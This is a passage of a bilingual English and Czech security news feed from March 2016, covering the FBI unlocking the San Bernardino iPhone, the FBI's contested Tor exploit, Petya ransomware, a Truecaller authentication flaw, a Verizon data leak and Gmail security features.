Unlike other available Windows 10 blocker tools, Never10 blocks the Windows 10 upgrade, but at the same time, the tool allows you to start the update process in case you change your mind, according to Windows watcher Paul Thurrott.
However, the primary purpose of Gibson's Never10 is to prevent Windows 7 and Windows 8.1 operating system from being upgraded to Windows 10. As Gibson says:
"Many users of Windows 7 and 8.1 are happy with their current version of Windows and have no wish to upgrade to Windows 10."
"There are many reasons for this, but among them is the fact that Windows 10 has become quite controversial due to Microsoft's evolution of their Windows OS platform into a service which, among other things, aggressively monitors and reports on its users' activities."
Moreover, just a month ago, Microsoft was caught displaying unsolicited advertisements on its Windows 10 users' desktops.
These reasons are enough for many users to stay on their previous versions of the Windows operating system.
Jak jste se dostali do zabijákova iPhonu? Apple si posvítí na FBI u soudu
30.3.2016 Ochrany
Americký Federální úřad pro vyšetřování (FBI) se snažil několik posledních měsíců donutit u soudu společnost Apple, aby mu zpřístupnila data z iPhonu zabijáka ze San Bernardina. Jenže karta se nyní obrátila a spolupráci po FBI vyžaduje naopak americký počítačový gigant. Vedení firmy chce zjistit, jak se vyšetřovatelé do jablečného smartphonu dostali. A obrátit se kvůli tomu podnik hodlá údajně i na soud.
Chyba v Zemanově čínském plánu – Návštěvu čínského prezidenta a její význam pro ČR komentuje Thomas Kulidakis Čtěte zde >>
Chytrý telefon od společnosti Apple byl přitom nastaven tak, aby se automaticky smazal po zadání deseti nesprávných přístupových hesel. Okamžitě se tak začaly množit otazníky nad tím, jak se vyšetřovatelům podařilo do uzamčeného přístroje dostat.
A vrásky mají kvůli tomu především bezpečnostní experti společnosti Apple. Vše totiž nasvědčuje tomu, že se v operačním systému iOS ukrývá nějaká kritická bezpečnostní chyba, o které zatím nic nevědí ani vývojáři amerického počítačového gigantu. Ta by umožňovala nejen FBI, ale i počítačovým pirátům průnik do jablečných zařízení.
Pokud by to byla pravda, v ohrožení by byly desítky miliónů chytrých telefonů iPhone a počítačových tabletů iPad. Tedy nejen ti, kdo jsou podezřelí ze spáchání nějakých trestných činů, ale i obyčejní uživatelé. [celá zpráva]
Na řadu přijdou právníci
Podle serveru Los Angeles Times již advokáti společnosti Apple vytvářejí právní taktiku, jak vládu přimět, aby prozradila všechna specifika o tom, jak se FBI podařilo proniknout do zabijákova iPhonu. Získat všechny detaily chtějí klidně i s pomocí soudu.
Vedení Applu svůj postoj a zájem získat podrobnosti prostřednictvím soudu nicméně oficiálně nepotvrdilo. Je ale vcelku pravděpodobné, že americký počítačový gigant zatím nechce z taktických důvodů odkrýt karty připravovaného právního sporu.
Bezpečnostní konzultant společnosti AVG Justin Olsson upozornil, že v sázce je důvěra zákazníků v produkty Applu. „Tak či onak, Apple potřebuje zjistit podrobnosti. Bez detailů o případné zranitelnosti nebudou vývojáři schopni zajistit soukromí svých zařízení,“ uvedl pro server Los Angeles Times Olsson.
Spor se táhne už měsíce
Celý spor mezi FBI a Applem se rozhořel kvůli tomu, že se vyšetřovatelům z FBI nepodařilo dva měsíce dostat do uzamčeného iPhonu islámského radikála. Právě kvůli neúspěchu vyšetřovatelů soud společnosti Apple nařídil, aby tuto funkci vypnula. To však vedení amerického počítačového gigantu odmítlo s tím, že to technicky není možné.
Jedinou možností je vytvoření „zadních vrátek“ do operačního systému iOS, který využívají právě chytré telefony iPhone a počítačové tablety iPad. Šéf Applu Tim Cook to ale opakovaně odmítal kvůli obavám ze zneužití. Implementací takového nástroje do zmiňované mobilní platformy by totiž byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti.
K datům se ale nakonec FBI stejně dostala, detaily ale tají.
Útok v San Bernardinu byl nejtragičtějším od teroristických útoků v zemi v září 2001. Zradikalizovaný muslim Syed Farook a jeho žena Tashfeen Maliková tam na počátku prosince zastřelili 14 lidí. Později byli zabiti při přestřelce s policií.
Data 1,5 milionu zákazníků ukradená Verizonu jsou na prodej
30.3.2016 Incidenty
Ve Verizon Enterprise Solutions při vší té péči o firemní zákazníky zřejmě trochu zapomněli dostatečně pečovat o vlastní sítě.
KrebsonSecurity upozorňuje, že se na uzavřeném fóru objevila nabídka na prodej databáze zákazníků Verizon Enterprise za 100 tisíc dolarů, případně po kusech, 10 tisíc dolarů za 100 tisíc záznamů.
Data jsou výsledkem úniku z informačních systémů B2B jednotky amerického telekomunikačního giganta Verizone, který řeší bezpečnost zákaznických systémů, prodává bezpečnostní řešení a který také každý rok vydává velmi zajímavou ročenku o únicích dat a narušeních systémů - viz Verizon’s annual Data Breach Investigations Report (DBIR).
Verizon Brianu Krebsovi potvrdil, že útočníci využili bezpečnostní chybu, která jim umožnila získat kontaktní informace zákazníků. To vše prostřednictvím portálu, který byl určen pro firemní zákazníky Verizonu. Podle společnosti se ale útočníci měli dostat pouze k základním informacím o zákaznících, nikoliv k podstatným datům, která by byla nějak výrazně nebezpečná.
Prodejce databáze ji nabízí dokonce i ve formátu pro databázový systém MongoDB, lze se tedy dost i domnívat, že ona bezpečnostní chyba je Verizonem tak trochu zlehčována. Vypadá to totiž na to, že se útočníkovi prostě podařilo pořídit přímo dump z databáze.
Jak konkrétně se účastníkům podařilo data získat, známo není. Verizon tvrdí, že už chybu napravil, ale detaily zatím neposkytl. Celé je to ještě pikantnější s ohledem na to, že to je například i Verizon, který v čerstvé studii ukazuje, jak se hackerům podařilo dostat do systémů pro úpravu vody a ovlivnit i to, jaké množství chemikálií je do vody uvolňováno (viz Hackers Modify Water Treatment Parameters by Accident) a v řadě dalších studií a analýz ukazuje velmi konkrétní informace o únicích a narušeních.
Microsoft built a special version of Windows 10 just for Chinese Government
30.3.2016 OS
China is very strict about censorship, which makes it difficult for companies to launch their products in the country. But companies like Microsoft are playing smartly to target the largest market in the world.
Microsoft has found a way to enter into the banned Chinese Market, but this time with official support for Chinese Government through a new custom and exclusive Windows 10 version for China.
It sounds like Microsoft has no issues like Apple, which strongly refused the court order to create a special ‘GovtOS’ version to help the Feds with unlocking iPhone.
Microsoft’s CEO for the Greater China region Ralph Haupter has confirmed that the company has built a Chinese government-approved version of Windows 10 OS that includes “more management and security controls” and less bloatware (pre-installed apps).
Specialized Windows 10 'Zhuangongban' for China
In a joint venture with a state-run technology and defense company, CETC (China Electronic Technology Group), Microsoft developed its specialized version of Windows 10 to comply with governmental standards.
The codename for the exclusive version of Windows 10 for China is called "Windows 10 Zhuangongban," which means "Specialized Class."
The customized version of Windows 10 would come with basic apps and additional integrated privacy standards which could be a trust gaining strategy by Microsoft among Chinese nationals.
The initial stern action of Chinese Government to ban Windows from the Chinese desks was the outcome of discontinued support of Windows XP officially by Microsoft. Moreover, the company enforced its XP user base to switch to Windows 8.
According to the survey of Net Applications, a US Based Analytics firm, it is reported that 51% of the Chinese users relies on Windows 7, whereas 32.9% users are still relying on the Windows XP, a discontinued product.
There had been made various efforts made by Chinese Government to build the counterpart of Windows XP called Neo-Kylin. But as the new player is in its infancy, it failed to grab the market attention as it lacked in the technical support.
As no other options left, Chinese Government finally convinced Microsoft to team up with a local technological company (CETC) to build a new OS, and Windows 10 Zhuangongban is the result of the same.
Microsoft's Target -- 1 Billion Windows 10
Microsoft’s goal to install its newest Windows 10 OS on one Billion devices worldwide is not possible without covering the largest market in the world.
Convincing Chinese Government to adopt its Windows 10, even if it is a customized version, is a great achievement for Microsoft, which would help the company reach its 1 Billion goal soon.
China, being the largest populated country in the world is a golden egg client for Microsoft to broaden the Windows 10 market base.
With the Windows 10 Zhuangongban OS, now let’s see: Which Nation would be the next target for Microsoft to play the same move in order to reach its goal? Will it be Germany or Russia??
FBI is fighting back against Judge's Order to reveal TOR Exploit Code
30.3.2016 Safety
Last month, the Federal Bureau of Investigation (FBI) was ordered to reveal the complete source code for the TOR exploit it used to hack visitors of the world’s largest dark web child pornography site, PlayPen.
Robert J. Bryan, the federal judge, ordered the FBI to hand over the TOR browser exploit code so that defence could better understand how the agency hacked over 1,000 computers and if the evidence gathered was covered under the scope of the warrant.
Now, the FBI is pushing back against the federal judge’s order.
On Monday, the Department of Justice (DOJ) and the FBI filed a sealed motion asking the judge to reconsider its ruling, saying revealing the exploit used to bypass the Tor Browser protections is not necessary for the defense and other cases.
In previous filings, the defence has argued that the offensive operation used in the case was "gross misconduct by government and law enforcement agencies," and that the Network Investigative Technique (NIT) conducted additional functions beyond the scope of the warrant.
The Network Investigative Technique or NIT is the FBI's terminology for a custom hacking tool designed to penetrate TOR users.
This particular case concerns Jay Michaud, one of the accused from Vancouver, Washington, who was arrested in last year after the FBI seized a dark web child sex abuse site and ran it from agency’s own servers for the duration of 13 days.
During this period, the FBI deployed an NIT tool against users who visited particular, child pornography threads, grabbing their real IP addresses among other details. This leads to the arrests of Michaud among others.
The malware expert, Vlad Tsyrklevich held by the defense to analyse the NIT, said that it received only the parts of the NIT to analyse, but not sections that would ensure that the identifier attached to the suspect's NIT-infection was unique.
"He is wrong," Special Agent Daniel Alfin writes. "Discovery of the 'exploit' would do nothing to help him determine if the government exceeded the scope of the warrant because it would explain how the NIT was deployed to Michaud's computer, not what it did once deployed."
In a separate case, the Tor Project has accused the FBI of paying Carnegie Mellon University (CMU) at least $1 Million to disclose the technique it had discovered that could help them unmask Tor users and reveal their IP addresses. Though, the FBI denies the claims.
Bitdefender Vaccine now supports also CTB-Locker, Locky, TeslaCrypt
30.3.2016 Virus
The prevention is better that the cure, users can immunize their PC against CTB-Locker, Locky and TeslaCrypt using Bitdefender Anti-ransomware vaccine.
Security experts from the Romanian security vendor Bitdefender have updated their anti-ransomware vaccine in order to protect machines from the latest versions of the CTB-Locker, Locky and TeslaCrypt ransomware.
According data recently published by Fortinet, top ransomware families are CryptoWall, Locky, and TeslaCrypt, while Cryptowall is predominant, Lock is rapidly spreading.
ransomware infections statistics
The Bitdefender Anti-Ransomware toolkit was developed by the company years ago to help victims of crypto-ransomware to prevent infections.
Some ransomware-decryptors tries to exploit encryption flaws in the ransomware implementation to decrypt files or use encryption keys discovered by law enforcement during their activity.
These conditions are not easy to match, so Bitdefender is promoting the prevention instead the cure by spreading its anti-ransomware vaccine.
The most recent version, 1.0.11.26, includes detection for the latest variant of ransomware in the wild, including CTB-Locker, Locky and TeslaCrypt.
These three ransomware had a different evolution in the last weeks, Locky for example is rapidly spreading meanwhile a new strain of TeslaCrypt appeared in the wild, the version 4.0 with implements significant improvements.
We have no news regarding the CTB-Locker, in fact, there are no new infections in the wild.
“Bitdefender anti-malware researchers have released a new vaccine tool which can protect against known and possible future versions of the CTB-Locker, Locky and TeslaCrypt crypto ransomware families.” state the announcement published by BitDefender.
“The new tool is an outgrowth of the Cryptowall vaccine program, in a way.” Chief Security Strategist Catalin Cosoi explained. “We had been looking at ways to prevent this ransomware from encrypting files even on computers that were not protected by Bitdefender antivirus and we realized we could extend the idea.”
Download the Bitdefender Anti-ransomware vaccine from the company website.
Feds request Judge to review the order to reveal TOR Exploit Code
30.3.2016 Safety
FBI is fighting back against the federal judge’s order to reveal the Tor Exploit and with DoJ filed a sealed motion requesting the review of the ruling.
A few weeks ago, a judge has ordered the FBI to reveal the complete source code for the TOR exploit to defense lawyers in a child porn case.
In a case involving child pornography, the FBI was ruled by a judge to provide all the code used to hack the PC of suspects and detailed information related to the procedure they have followed to de-anonymize Tor users.
Colin Fieman, a federal public defender working on the case was asked by motherborard.vice.com if the code would include exploits to bypass security features, Fieman’s reply was that the code would bypass “everything.”
“The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified,” he told to MotherBoard.
Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested by the FBI right after the FBI closed a popular child pornography site called “Playpen” hosted in the dark web, and where a network investigative technique (NIT)—the agency’s term for a hacking tool.
According to court documents reviewed by Motherboard, the FBI had used the NIT to identify the suspects while surfing on the Tor network.
The FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”
The FBI was able to harvest around 1300 IPs, and until the moment 137 people have been charged. The network investigative technique used by the FBI included computers in the UK, Chile and Greece.
The defence has argued that the investigation that leveraged on the NIT was “gross misconduct by government and law enforcement agencies,” and that the Tor Exploit conducted operations out of the warrant scope.
In January, a report published by the Washington Post confirmed that in the summer of 2013 Feds hacked the TorMail service by injecting the NIT code in the mail page in the attempt to track its users.
Last month the federal judge Robert J. Bryan ordered the FBI to hand over the TOR browser exploit code in order to allow the defence to understand how the law enforcement used it.
Now, the FBI is fighting back against the federal judge’s order and with the Department of Justice (DOJ) filed a sealed motion requesting the review of the ruling.
The FBI and the DoJ sustain that it is not necessary to reveal the details of the Tor exploit.
The security expert and exploit developer Vlad Tsyrklevich who analyzed the Tor Exploit for the defense explained that he received only a portion of the NIT code, but he argued to haven’t reviewed the portion of code that link NIT identifier with a specific suspect.
“He is wrong,” Special Agent Daniel Alfin writes. “Discovery of the ‘exploit’ would do nothing to help him determine if the government exceeded the scope of the warrant because it would explain how the NIT was deployed to Michaud’s computer, not what it did once deployed.”
FBI může znát chybu v iPhonu, o které neví ani Apple
29.3.2016 Ochrany
Americký Federální úřad pro vyšetřování (FBI) se v noci na úterý pochlubil, že se mu podařilo obejít zabezpečení iPhonu zabijáka ze San Bernardina. To je pro Apple velmi špatná zpráva. Vše totiž nasvědčuje tomu, že vyšetřovatelé znají nějakou kritickou bezpečnostní chybu operačního systému iOS, o které patrně nemají ještě informace ani vývojáři amerického počítačového gigantu.
Vyšetřovatelé už minulý týden v úterý informovali, že jsou pravděpodobně schopni iPhone Syeda Farooka odkódovat. [celá zpráva]
Přesně po týdnu zástupci FBI oznámili, že se jim k datům skutečně podařilo dostat. Jak to udělali, však zatím stále tají a nic nenasvědčuje tomu, že by v dohledné době svoji metodu široké veřejnosti prozradili.
Takovéto chyby mohou poskytnout úplný přístup k zařízením.
bezpečnostní konzultant Ross Schulman
Právě to ale může představovat poměrně velký problém. Jak uvedl bezpečnostní konzultant Ross Schulman pro server CNN, FBI totiž mohl objevit chybu v operačním systému iOS, který využívají právě chytré telefony iPhone a počítačové tablety iPad.
Stejným způsobem by se tak vyšetřovatelé byli schopní dostat i do dalších jablečných zařízení. „Z minulosti víme, že takovéto chyby mohou poskytnout úplný přístup k zařízením, na které se mnoho z nás spoléhá každý den,“ prohlásil Schulman.
Chyba může ohrožovat i další uživatele
Podle něj by tak měl Apple ve vlastním zájmu chtít zjistit, jak se FBI do zabijákova iPhonu dostal. Jen tak totiž budou jeho lidé schopni vyřešit případnou chybu a ochránit tak všechny ostatní uživatele.
Vyšetřovatelům pravděpodobně s prolomením zabezpečení iPhonu pomohla společnost Cellebrite se sídlem v Izraeli. Firma britské stanici BBC potvrdila, že s americkými vyšetřovateli spolupracuje, ale více nesdělila.
Na svých internetových stránkách nicméně Cellebrite prohlašuje, že jeden z jejich nástrojů umí dekódovat a extrahovat data z iPhonu 5C. [celá zpráva]
Dva měsíce neúspěšného snažení
FBI se snažil do uzamčeného iPhonu islámského radikála dostat celé dva měsíce. Útočník měl ale svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal, s čímž si bezpečnostní experti z FBI původně nedokázali poradit.
Soud proto Applu v únoru nařídil, aby tuto funkci vypnula, což však není technicky možné. Proto vyšetřovatelé chtěli po americkém softwarovém gigantu vytvořit v operačním systému iOS „zadní vrátka“, což však vedení Applu odmítalo.
Šéf Applu Tim Cook tehdy upozorňoval na to, že implementací takového nástroje do zmiňované mobilní platformy by byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti. A nehraje roli, zda by šlo o přístroj teroristy, nebo běžného občana.
Na nový vyděračský virus jsou antiviry krátké
29.3.2016 Viry
Internetem se začal jako lavina šířit nový vyděračský virus Petya, který dokáže zašifrovat data na pevném disku. Bezpečnostním expertům dělá vrásky na čele především proto, že je výrazně rychlejší než prakticky všichni jeho předchůdci. To může značně ztížit jeho odhalení, upozornil server PC World.
Útoky vyděračských virů jsou v posledních týdnech stále častější a mají prakticky vždy stejný scénář. Nezvaný návštěvník zašifruje uložená data na pevném disku. Útočníci se snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod.
Ani po zaplacení výkupného se uživatelé ke svým datům nedostali. Místo placení výkupného je totiž nutné virus z počítače odinstalovat a data rozšifrovat, což ale nemusí být vůbec jednoduché. A ve většině případů to dokonce nejde vůbec.
Důležitá je rychlost
V čem je tedy Petya tak výjimečná? Většina vyděračských virů potřebuje k zašifrování dat na pevném disku poměrně dost času, klidně i několik hodin. Během toho může jejich práci zachytit antivirový program a zablokovat je ještě dříve, než v počítači nadělají nějakou větší neplechu.
Právě proto funguje Petya trochu odlišným způsobem. Na disku nezašifruje všechna data, ale pouze tzv. MBR. Jde o hlavní spouštěcí záznam, díky kterému se v podstatě spouští celý operační systém. K zašifrovanému záznamu pak počítač nemá přístup a místo Windows spustí jen hlášku o nutnosti zaplatit výkupné.
Na zašifrování MBR nepotřebuje nový vyděračský virus několik hodin, stačí mu pouze pár vteřin. Antiviry tak prakticky nemají šanci škodlivý kód zachytit. Hned po prvním restartu je pak problém na světě.
Za odšifrování chtějí 10 000 Kč
Vyděrači navíc nejsou žádní troškaři, za odšifrování požadují jeden bitcoin, což představuje při aktuálním kurzu více než 10 000 korun. Znovu je ale nutné zdůraznit, že zmiňovanou částku by lidé v žádném případě platit neměli. Útočníci jen shrábnou peníze a zmizí.
Petya se šíří v současnosti především v USA a sousedním Německu prostřednictvím nevyžádaných e-mailů. Je ale více než pravděpodobné, že se v dohledné době objeví také v České republice.
Remotely Exploitable Bug in Truecaller Puts Over 100 Million Users at Risk
29.3.2016 Crime
Security researchers have discovered a remotely exploitable vulnerability in Called ID app "Truecaller" that could expose personal details of Millions of its users.
Truecaller is a popular service that claims to "search and identify any phone number," as well as helps users block incoming calls or SMSes from phone numbers categorized as spammers and telemarketers.
The service has mobile apps for Android, iOS, Windows, Symbian devices and BlackBerry phones.
The vulnerability, discovered by Cheetah Mobile Security Research Lab, affects Truecaller Android version of the app that has been downloaded more than 100 Million times.
The actual problem resides in the way Truecaller identify users in its systems.
While installation, Truecaller Android app asks users to enter their phone number, email address, and other personal details, which is verified by phone call or SMS message. After this, whenever users open the app, no login screen is ever shown again.
This is because Truecaller uses the device's IMEI to authenticate users, according to researchers.
"Anyone gaining the IMEI of a device will be able to get Truecaller users' personal information (including the phone number, home address, mail box, gender, etc.) and tamper app settings without users' consent, exposing them to malicious phishers," Cheetah Mobile wrote in a blog post.
Cheetah Mobile researchers told The Hacker News that they were able to retrieve personal data belonged to other users with the help of exploit code just by interacting with Truecaller's servers.
On a successful exploitation of this flaw, the attackers can:
Steal personal information like account name, gender, e-mail, profile pic, home address, and more.
Modify a user's application settings.
Disable spam blockers.
Add to a black list for users.
Delete a user's blacklist.
Cheetah Mobile informed Truecaller of this flaw, and the company updated their servers as well as released an upgraded version of its Android app on March 22 in order to prevent abuse exploiting this flaw.
Truecaller said in its blog post published Monday that the vulnerability did not compromise any of its user information.
If you haven’t, download the latest version of Truecaller for your Android devices from the Google Play Store Now!
5 Things Google has Done for Gmail Privacy and Security
29.3.2016 Security
Over the past few years, Google has increasingly improved the online security and protections of its Gmail users.
Besides two-factor authentication and HTTPS, Google has added new tools and features to Gmail that ensures users security and privacy, preventing cyber criminals and intelligence agencies to hack email accounts.
1. Enhanced State-Sponsored Attack Warnings
Enhanced State-Sponsored Attack Warnings
Apple vs. FBI case urged every company to beef up the security parameters to prevent their services from not just hackers but also the law enforcement.
Google for a while now has the capability to identify government-backed hackers, and notify potentially affected Gmail users so they can take action as soon as possible.
Google recently announced on its blog post that it will alert Gmail users about the possibility of any state-sponsored attack by showing them a full-page warning with instructions about how to stay safe — very hard to miss or neglect.
Meanwhile, the company revealed that over 1 Million Gmail accounts may have been targeted by government-backed hackers so far.
Although Google has warned Gmail users of state-sponsored attackers since 2012, the company neither disclosed the exact number nor explained how it knows of such hacking attacks.
However, Google said that it knows who the targets are – the list often includes "activists, journalists, and policy-makers taking bold stands around the world."
2. SMTP Strict Transport Security (SMTP STS)
SMTP Strict Transport Security (SMTP STS)
A new security feature dubbed "SMTP STS" has been on the bench of the Internet Engineering Task Force (IETF) to obtain a green signal.
This new email standard is developed in a joint effort by the engineers of top email services including Google, Microsoft, Yahoo!, Comcast, LinkedIn, and 1&1 Mail & Media Development.
SMTP STS has been designed to enhance the email security by preventing Man-in-the-Middle (MitM) and encryption downgrade attacks that have compromised past efforts like STARTTLS at making SMTP a more secure protocol.
SMTP Strict Transport Security (SMTP STS) runs on top of the STARTTLS feature to strengthen SMTP standard.
SMTP STS will check if recipient supports SMTP STS and has valid and up-to-date encryption certificate. If everything goes well, it allows your message to go through. Otherwise, it will stop the email from sending and will notify you of the reason.
3. End-to-End Encryption (via Chrome Extension Only)
Google announced the End-To-End encryption for its users almost two years ago, but still, the novel feature is yet to release.
The idea is to develop a browser extension that ensures its users Privacy by implementing the complex, yet secure PGP (Pretty Good Privacy) encryption in an attempt to fully encrypt messages that even Google can not read, nor anyone else other than the users exchanging the emails.
With this goal in mind, the browser extension will let users create their private and public encryption keys within their browsers. The public key will be uploaded to Google's servers, while the private key will be stored locally in the browser.
How the End-to-End Chrome Extension Works:
gmail-end-to-end-encryption
When a user sends an email to the other user with a PGP key, his or her browser will automatically download the other user's public key from the server and encrypt the content of the email.
However, the work is still in progress, and the company has not revealed that when it is planning to release the browser extension.
Although Google made the source code for its End-to-End Chrome extension open source via GitHub almost a year ago, so that researchers can review it, the stable version is yet to release.
For now, you can try an alternative method to send encrypted emails. We have written a step-by-step tutorial article on how to send end-to-end encrypted emails to others.
If difficult, you can try a Swiss-based, ProtonMail, a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data safe.
4. Gmail's Red Padlock Alert
gmail-red-padlock-alert
Previously there was no method to ensure whether the received email had been traversed via an encrypted channel or not, which could be subjected to scrambling or Man-in-the-Middle (MiTM) attacks.
But last month, Google introduced a security measure in Gmail service in the form of a small Red Padlock next to a sender's email address in an effort to highlight users if the message has been sent through an unencrypted channel.
If a Gmail user receives an email from other services that don't support TLS encryption, the feature gives warning by showing an open red lock next to the sender’s email address (as shown).
These unencrypted emails then went to spam, increasing Gmail security of its users.
5. Google Safe Browsing For A Quick Malware Check
Google Safe Browsing For A Quick Malware Check
One of Google's recent changes is the expansion of its 'Safe Browsing' notifications.
The malicious links spread via emails are an easy hit method to infect a large number of users after forcing them to visit malicious web pages controlled by hackers.
However, the Safe Browsing feature protects Gmail users by identifying potentially dangerous links in emails.
The automated agents in the mail scan the content of emails for spam and malware detection. And before opening the link, Gmail inspects the complete mail and prevents the user to open the malicious links in the main upon a quick scan.
The features that are being added by Google helps the privacy of Gmail users and stricken the email confidential policies.
FBI Has Successfully Unlocked Terrorist's iPhone Without Apple's Help
29.3.2016 Apple
End of Apple vs. FBI. At least for now, when the FBI has unlocked iPhone successfully.
Yes, you heard it right. The Federal Bureau of Investigation (FBI) has unlocked dead terrorist's iPhone 5C involved in the San Bernardino shooting without the help of Apple.
After weeks of arguments, the United States government is withdrawing its motion compelling Apple to build a backdoored version of its iOS that can help the agency unlock iPhone of San Bernardino gunman Syed Farook.
The Department of Justice (DOJ) says that FBI has successfully accessed iPhone's data with the help of an undisclosed alternative method and that it no longer needs Apple's assistance.
"The government has now successfully accessed the data stored on Farook's iPhone and therefore no longer requires the assistance of Apple," the attorneys wrote in a court filing Monday. "Accordingly, the government hereby requests that the Order Compelling Apple Inc to Assist Agents in Search dated February 16, 2016, be vacated."
Meanwhile, a DoJ spokeswoman said in a statement: "The FBI is currently reviewing the information on the phone, consistent with standard investigatory procedures."
Last week, the DoJ delayed its court hearing against Apple so it could try a possible method of unlocking iPhone for which they have hired an "outside party".
At the time, Apple said it did not know any way to gain iPhone's access but hoped that the Feds would share with them any information of loopholes that might come to light in the iPhone.
Although the technique the FBI used to crack the iPhone is not disclosed and likely will not be any time soon, several experts suspect it involved NAND Mirroring.
Nand Mirroring is a technique used to copy the contents of the phone's NAND memory chip and flash a fresh copy back onto the chip when the max number of attempts is exceeded.
With the discovery of the alternative method, the legal battle between the FBI and Apple seems to be over in this particular case, but it does not end the overall battle about privacy and security.
As Apple has issued a statement, saying the company is committed to continuing its fight for civil liberties and collective security and privacy.
The full statement (via Verge) from Apple reads:
From the beginning, we objected to the FBI's demand that Apple builds a backdoor into the iPhone because we believed it was wrong and would set a dangerous precedent. As a result of the government's dismissal, neither of these occurred. This case should never have been brought.
We will continue to help law enforcement with their investigations, as we have done all along, and we will continue to increase the security of our products as the threats and attacks on our data become more frequent and more sophisticated.
Apple believes deeply that people in the United States and around the world deserve data protection, security and privacy. Sacrificing one for the other only puts people and countries at greater risk.
This case raised issues which deserve a national conversation about our civil liberties, and our collective security and privacy. Apple remains committed to participating in that discussion.
FBI breaks into San Bernardino shooter’s iPhone
29.3.2016 Apple
The Department of Justice says the FBI has broken into the iPhone used by the San Bernardino shooter, it no longer needs the help of Apple.
The US Department of Justice (DoJ) announced it has broken into San Bernardino shooter‘s iPhone and it had accessed encrypted stored on the device.
After a long battle between Apple and the FBI, the DoJ now no longer needs the company to help unlock the iPhone 5C used by one of the San Bernardino terrorists.
The DoJ had originally sought to force Apple in providing a method to access data on the terrorist’ iPhone device, a couple of weeks ago DOJ released a brief filing that threatens to force Apple to hand over the iOS source code if it will not help the FBI in unlocking the San Bernardino shooter ’s iPhone.
Now the El Reg published a filing made Monday to the Central California District Court that confirms prosecutors have successfully extracted data from the iPhone.
“The government has now successfully accessed the data stored on Farook’s iPhone and therefore no longer requires the assistance from Apple Inc. mandated by the court’s order compelling Apple Inc. to assist agents in search, dated February 16, 2016,” reads the DoJ request.
The DoJ hasn’t provided details on the procedure used to break into the San Bernardino shooter ‘s iPhone, nor revealed the name of the firm that supported the FBI in the operation.
Last week security experts speculated the involvement of the Israeli mobile security firm Cellebrite.
Despite the intense legal battle between Apple and FBI, security experts have always confirmed the existence of methods to unlock the iPhone devices.
Data could have been accessed with either hardware or software techniques, this means that in the future the FBI could use the same methods in other cases, as explained by the security expert Jonathan Ździarski.
If the method used in this case turns out to be a software method, from what I see of the OS, the method could work on newer devices too.
A law enforcement official, speaking to the CNN on condition of anonymity, explained it was “premature” to say whether this method works on other Apple devices. He added that the method used by law enforcement worked on this particular phone, an iPhone 5C running a version of iOS 9 software.
Snowden always declared that the US Government has the technology to crack the security measures implemented by Apple.
Snowden in a video call at Blueprint for a Great Democracy conference accused the FBI of lying defining its declaration as absurd, in reality, he used a more colorful expression.
“The FBI says Apple has the ‘exclusive technical means’ to unlock the phone,” said Snowden in video conference “Respectfully, that’s horse sh*t.”
Snowden opinion on Apple vs FBI case San Bernardino shooter
On the same day, Snowden shared via Twitter a link to an American Civil Liberties Union blog post titled “One of the FBI’s Major Claims in the iPhone Case Is Fraudulent,” which explains that the FBI has the ability to bypass iPhone protection mechanism.
The fact that the FBI was able to successfully crack the phone without Apple’s help demonstrates that tech giants need to improve their efforts to protect users’ privacy.
Petya, ransomware šifrující zaváděcí záznam disku MBR
29.3.2016 Viry
Petya, ransomware šifrující zaváděcí záznam disku MBRDnes, Milan Šurkala, aktualitaProtože zašifrování celého disku je velmi nákladná operace, nový ransomware Petay na to jde mnohem jednoduše. Zašifruje zaváděcí záznam MBR na pevném disku a ten se tak stane nečitelným. Útočníci pak vyžadují výkupné.
V dnešní době začínají být útoky ransomware (vyděračského softwaru) čím dál častější. Jde v podstatě o to, že škodlivý kód získaný obvykle otevřením nebezpečné přílohy e-mailu zašifruje celý pevný disk a pak po oběti vyžaduje výkupné za opětovné zpřístupnění dat. Nový ransomware Petya jde na věc trochu jinak. Místo celého disku zašifruje pouze jeho MBR, která říká, kde je jaký soubor. Efekt na napadený počítač je ale v podstatě stejný. Nelze vědět, kde jsou jaká data a ta jakoby ani neexistovala.
Zvláštní vlastností tohoto softwaru je právě v tom, že šifruje jen MBR, což může provést v podstatě okamžitě (MBR není zrovna obrovská struktura). Ransomware Petya vynutí kritickou chybu operačního systému a přinutí jej restartovat. Protože se MBR zašifruje, operační systém nemůže nabootovat a objeví se hláška vyžadující výkupné. Útočníci požadují necelý bitcoin, což je v dnešní době zhruba 10 tisíc korun. Ostatní ransomware metody kvůli šifrování celého disku mohou být zpozorovány, neboť tento proces zabere dlouhou dobu, je výpočetně náročný a je možné násilně vypnout počítač dříve, než zašifruje celý disk. Petya se šíří přes e-mail ohledně pracovních nabídek vybízející ke stažení přílohy uložené na Dropboxu. Zatím se tak děje zejména v Německu.
FBI nakonec hackla iPhone útočníka, pomoc Applu už nepotřebuje
29.3.2016 Ochrany Zdroj: Lupa.cz
Podivuhodný soudní spor má podivuhodný konec. Tedy – aspoň v tomto kole. Řada otázek ale pořád zůstává nezodpovězených.
„Úřadům se podařilo úspěšně proniknout k datům uloženým ve Farookově iPhonu, a proto už nevyžadují spolupráci od firmy Apple Inc., nařízenou soudním příkazem z 16. února.“ Čerstvé prohlášení amerického ministerstva spravedlnosti (PDF) potvrzuje, že se FBI nakonec podařilo proniknout ochranami Applu i bez jeho pomoci.
Úřady tak požádaly soud o zrušení příkazu. Několik měsíců se táhnoucí soudní spor, ve kterém Apple odmítl FBI pomoci a vytvořit speciální verzi systému iOS, která by pomohla obejít ochranu iPhonu, tak končí.
Tip: Mnoho povyku pro PIN. O co vlastně jde v boji mezi FBI a Applem
Ministerstvo zatím nezveřejnilo žádné podrobnosti o tom, jakým konkrétním způsobem se nakonec k datům dostalo. Připustilo jen, že s metodou přišel někdo mimo FBI – „třetí strana“. Izraelský deník Yedioth Ahronoth minulý týden napsal, že by mohlo jít o tamní firmu Cellebrite. Úřady i firma ale informaci odmítly komentovat.
